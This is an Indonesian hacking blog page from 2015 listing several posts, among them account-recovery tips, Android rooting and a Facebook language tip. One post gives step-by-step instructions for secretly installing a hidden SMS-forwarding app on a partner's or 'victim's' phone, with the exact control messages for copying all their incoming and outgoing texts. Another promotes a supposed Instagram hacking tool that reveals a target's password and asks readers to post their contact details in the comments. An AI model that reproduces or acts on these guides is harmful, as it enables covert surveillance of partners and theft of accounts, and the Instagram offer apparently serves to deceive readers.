Hacker

Thursday, 17 December 2015

1 Cara Hancurkan Desktop

22:26 Under From Rambo 007
[1 Comment]
seram sepertinya judulnya,. sebenernya yang dimaksud disini adalah aplikasi/softwere yang di perintahkan untuk membuat suasana baru,.. hmm,.. ya,. munkin sebagian agan bosan dengan tampilan desktopnya dan ingin sesekali mencoba mengacaknya,.. tenang saja,. hal ini tidak berpengaruh fatal,. ini hanya aplikasi yang di buat untuk memberi kesan baru tanpa efek samping,. gak kayak obat batuk di warung sebelah pokoknya dah,.. hahaha,. oke langsung saja di download dibawah ini,..




Download Aplikasinya Disini
Read More »

2 Cara Kembalikan Facebook yang di Hack

22:16 Under From Rambo 007
[2 Comment]
begitu banyak cara dilakukan demi mempromosikan suatu produk ataupun jasa. Tak peduli melalui cara putih ataupun hitam.
Beberapa dari mereka yang menjual jasa ataupun produknya, jelas, ingin jasa atau produk mereka dikenal oleh banyak orang, dan berharap orang-orang yang melihat

produk mereka, mau untuk membelinya.Sebuah laporan yang berasal dari salah satu teman author kami mengatakan, bahwa akun facebooknya telah di bajak. Seseorang telah berhasil meretas akun facebook nya. Dan yang menjadi unik disini, setelah sang peretas berhasil menguasai penuh akun facebook tersebut, mereka ( si peretas/hacker ) memasukkan foto-foto yang merupakan sebuah penawaran iklan. Dan si hacker memposting foto-foto tersebut.

Memang, kejadian seperti itu banyak di alami oleh mereka yang kurang menjaga dan mengamankan akun mereka. Namun untungnya, akun Facebook dari teman author kami tersebut bisa kembali ke tangannya.

Lalu, bagaimana cara mengembalikan akun Facebook yang telah di retas Hacker ?

Berikut tips yang mungkin bisa membantu , Cara Mengembalikan Akun Facebook Yang di Retas :




1. Biasanya, si hacker mengganti password dari akun yang ia bajak, lalu, langkah yang harus Anda ambil adalah segera reset password dari akun Facebook Anda dengan cara menuju ke halaman =>Disini<=

2. Si hacker yang lebih mahir, akan segera dengan cepat mengganti email dari akun Facebook Anda, dengan tujuan untuk segera menghilangkan jejak. Untuk ini, Anda segeralah meminta bantuan dengan mengunjungi link berikut  =>Disini<=

3. Jika akun facebook Anda sudah kembali , segeralah meng-un-install semua app yang ada di akun Facebook Anda. Dan terakhir, periksalah menggunakan antivirus.
  

Itu Beberapa cara yang bisa anda coba, dan berdoalah semoga akuun facebook anda yang diretas orang lain apalgi dissalahgunakan nanti kembali lagi dipangkuan anda, misal anda belum berhasil mungkin anda kurang beruntung hehe'
Demikian , saya hanya berdoa bagi anda semoga berhasil, Terima Kasih
 
Read More »

Sunday, 6 December 2015

1 Cara Sadap Sms Pacar / Orang Lain

00:44 Under From Rambo 007
[1 Comment]
Cara sadap sms yang saya akan bagikan kali ini memang bukan hal baru lagi. namun,mungkin saya para sahabat asap ada yang belum mengetahuinya, jadi saya akan share saja

Download aplikasinya  => DISINI <=

  1. Hp yang di butuhkan harus Hp Symbian (baik HP anda maupun HP korban)
  2. Harus memiliki aplikasy symbian smsanywherelite.sis 

  (nb: Hp korban harus sama mempunyai aplikasi symbian smsanywherelite.sis)



Oke langsung saja kita simak cara sadap Hp berikut ini

  1. Masukkan aplikasi symbian itu di HP anda dan juga di HP calon korban/target. 
  2. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel.
    Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain.

    (Inilah keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut) 
  3. Siapkan hp/ponsel korban anda 
  4. Siapkan HP anda yang akan menerima sms masuk dari korban anda. 
  5. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama. 
  6. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0 
  7. Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya. 
Read More »

306 Cara Hack account Instagram dengan softwere Terbaru 2015

00:06 Under From Rambo 007
[306 Comment]
baik gan,.. kali ini awan akan berbagi aplikasi hacked instagram, sebelum dimulai mohon dibaca baik-baik,.. penggunaan aplikasi adalah dengan menyangkutkan pada pihak ketiga,. jadi da

lam hal ini sahabat di harapkan untuk tetap berhati-hati agar tidak terjadi hal yg merugikan bagi orang lain ataupun sahabat sendiri,.. disini awan cuma berusaha buat offer aja ya,. meskipun awan pribadi kurang menganjurkan mengingat akan mungkin ada pihak yang dirugikan

nah yang pertama dilakukan adalah download aplikasinya => DISINI <=

1. Download Aplikasi Instagram Hack

2. Kemudian Buka aplikasinya dan klik “Install This Application”

3. Setelah itu lanjutkan dengan terus mengklik “Next” Sampai Aplikasi selesai diinstall. Proses Instalasi sekitar 4 menit.

4. Selesai Aplikasi Instagram Hack sudah berhasil anda install.

Setelah mengikuti proses instalasi dan sudah selesai instalasinya kita kembali ke tutorial. Tutorial nya sebagai berikut :

  • Anda Buka Aplikasi Instagram Hack tadi yang sudah selesai anda Install.
  • Anda Masukkan ID (Username) instagram yang ingin diretas tanpa menggunakan tanda/simblo “@” . Langsung saja anda tulis Username nya.
  • Setelah itu anda klik “Start Recovery Password” Atau “Crack Password”
  • Lalu tunggu prosesnya sekitar 5 menit saja.
  • Dan akan muncul password beserta data-data akun korban :)
untuk activatornya silahkan tinggalkan alamat yang bisa di hubungi,. email / facebook di komentar,.. secepatnya saya kirimkan activatornya,.. hal ini untuk melindungi dari pencurian ya gan 
Read More »

Saturday, 5 December 2015

0 Cara Melacak Lokasi Seseorang melalui Nomor HP

05:07 Under From Rambo 007
[0 Comment]
Jika Anda Terkena Teror SMS ataupun telp dari nomor yang tidak dikenal??
Atau mungkin anda ingin mencari adik, pacar, istri dan selingkuhan anda yang hilang?? jangan tergesa-gesa lapor polisi dulu karena anda bisa melacak keberadaanya melalui nomor handphone-nya.

ada sebuah situs yang memiliki fasilitas melacak lokasi nomor handphone Lacak Lokasi HP

1. Kunjungi situs Lacak Lokasi HP

2. Kemudian masukkan nomor HP yang anda ingin  anda lacak pada kotak PSTN

3. Kemudian klik tombol Search untuk memulai pelacakan






4. Lihatlah Nomor yang saya lacak ternyata di Banyuwangi


NB: Lokasi pencarian berdasarkan lokasi penerbitan nomor, bukan lokasi sebenarnya. Mohon baca penjelasan dibawah.
Read More »

Friday, 4 December 2015

1 Cara Mudah Root Android tanpa PC Terbaru Desember 2015

22:16 Under From Rambo 007
[1 Comment]
Kali ini Saya Akan Berbagi Cara nya Untuk Melakukan Root Di ANDROID 2015

Tanpa Pc/Laptop

Apa Sih Root itu..???

Root Adalah Memberikan Akses Penuh Kepada Pengguna Android

Dan Hasil Tampilan nya Nanti Jauh Lebih Bagus Android Yg Sudah Di Root Daripada Yg Belum Di Root

Namun Sebelum Kita Melakukan Root Ada Baik nya Kita Mengetahui Resiko nya

Resiko Android Yg Sudah Di Root Adalah Kita Bisa Kehilangan Garansi Resmi

dan Juga Menyebabkan Kerusakan Hp Apabila Terjadi Kegagalan Saat Proses Root Sedang Di Lakukan Namun ini Sangat Jarang Terjadi

Yukk Langsung Menuju Tutorial Cara Root Android Bisa Untuk Semua Versi






1. Download Aplikasi nya => KLIK DISINI <=

2. Instal Dan Buka Aplikasi nya

3. Tekan Gambar Lingkaran Root

4. Tunggu Proses Root Sampai Selesai ( Jangan Sampai Hp nya Mati Ke Habisan Batrei )

5. Jika Root Behasil Nanti Akan Muncul Gambar Jempol Di Lingkaran Root

Sekian Tips Dan Trik Cara Root Hp Android
Semoga Bermanfaat

Read More »

0 Cara Merubah Bahasa Facebook ke Bahasa ALay

22:06 Under From Rambo 007
[0 Comment]
Pada Postingan Kali ini Sya Akan Berbagi Tips Dan Trik Seputar Facebook Yaitu Cara Merubah Tulisan / Bahasa Facebook Yg Kita Gunakan Menjadi Tulisan / Bahasa ALAY
Setelah Saya Telusuri Ternyata Di Facebook Bisa Merubah Bahasa Yg Bisa Kita Gunakan Menjadi Bahasa Anak ALAY
Bahasa Alay Ternyata Cukup Terkenal Tidak Hanya Ada Di Indonesia Akan Tetapi Sampai Di Luar Negri Pun Ada Bahasa ALAY
Oke Dah Berikut ini Cara Merubah Bahasa Facebook ke Bahasa Alay


1. Login / Masuk Dulu Ke Akun FB mu
2. Buka Pengaturan Akun / Setting
3. Pilih Bahasa
4. Ganti Bahasa Yg Kalian Gunakan Menjadi Leet Speake

Untuk Lebih Jelas nya Lihat Gambar Dibawah ini





Nah itu Tadi Cara Merubah Bahasa Facebook Ke Bahasa Alay
Semoga Bermanfaat
Read More »